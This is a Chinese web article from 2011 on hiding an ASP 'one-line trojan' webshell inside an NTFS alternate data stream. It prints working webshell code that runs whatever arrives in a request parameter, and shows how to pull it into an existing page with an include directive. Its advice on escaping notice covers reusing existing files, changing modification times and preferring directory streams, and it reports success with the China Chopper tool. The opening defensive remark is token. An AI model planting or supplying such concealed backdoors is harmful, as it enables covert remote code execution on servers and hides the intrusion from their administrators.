利用ntfs流隐藏你的一句话木马的方法
发布时间:2011-09-29 23:09:49 作者:佚名 
我要评论
我要评论利用ntfs流隐藏你的一句话木马的方法,好邪恶啊,大家一定要注意防范啊。建议服务器安全设置弄好。
这是利用NTFS流隐藏你的一句话小马,这方法,文件写入后,不容易给发现,隐藏性好!
如下是ASP脚本的例子!
NTFS流文件的内容如下
<%
re= request("test")
if re <>"" then
execute re
response.end '表示结束,不再处理别的代码
end if
%>
把内容写入如下位置(示例位置)
H:\Web\动易\Inc:1.jpg
看清楚,是 :1.jpg 不是 \1.jpg
文件写入后,H:\Web\动易\Inc 目录里是看不到文件的!
现在要引导这个一句话文件!格式: <!--#include file="目录:1.jpg"-->
我随便选一个文件(最好不要自己新建文件,别人容易发现有新文件)
H:\Web\动易\Announce.asp
添加
<!--#include file="inc:1.jpg"-->
修改后保存!
一句话木马隐藏基本完成!当然 H:\Web\动易\Announce.asp 你可以改个一下修改的时间,
这样别人就不容易发现有问题!
还有说一下,2003的流,是可以写入文件也可以写入目录的!你想把一句话马写在目录里也成,文件里也成
但建议保存到目录里,因为文件如果修改,流数据将会清空,但目录不会!
用菜刀测试成功!
相关文章
本文来介绍一下thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随2018-12-12记 FineUI 官方论坛discuz所遭受的一次真实网络攻击
这篇文章主要介绍了记 FineUI 官方论坛discuz所遭受的一次真实网络攻击,需要的朋友可以参考下2018-11-30- 这篇文章主要介绍了Linux 下多种反弹 shell 方法,需要的朋友可以参考下2017-09-06
- 这篇文章主要为大家介绍了基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端触发执行从而发起Web攻击,需要的朋友可以参考下2017-05-20
- 这篇文章主要介绍了SQL注入黑客防线网站实例分析,需要的朋友可以参考下2017-05-19
- 这里为大家分享一下sql注入的一些语句,很多情况下由于程序员的安全意识薄弱或基本功不足就容易导致sql注入安全问题,建议大家多看一下网上的安全文章,最好的防范就是先学2017-05-19
- 对于目前流行的sql注入,程序员在编写程序时,都普遍的加入防注入程序,有些防注入程序只要在我们提交一些非法的参数后,就会自动的记录下你的IP地址,提交的非法参数和动作等,2017-04-29
- 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类2016-12-27
- 这篇文章主要介绍了Python 爬虫使用动态切换ip防止封杀的相关资料,需要的朋友可以参考下2016-10-08
- 这篇文章主要介绍了使用爬虫采集网站时,解决被封IP的几种方法的相关资料,需要的朋友可以参考下2016-10-08
最新评论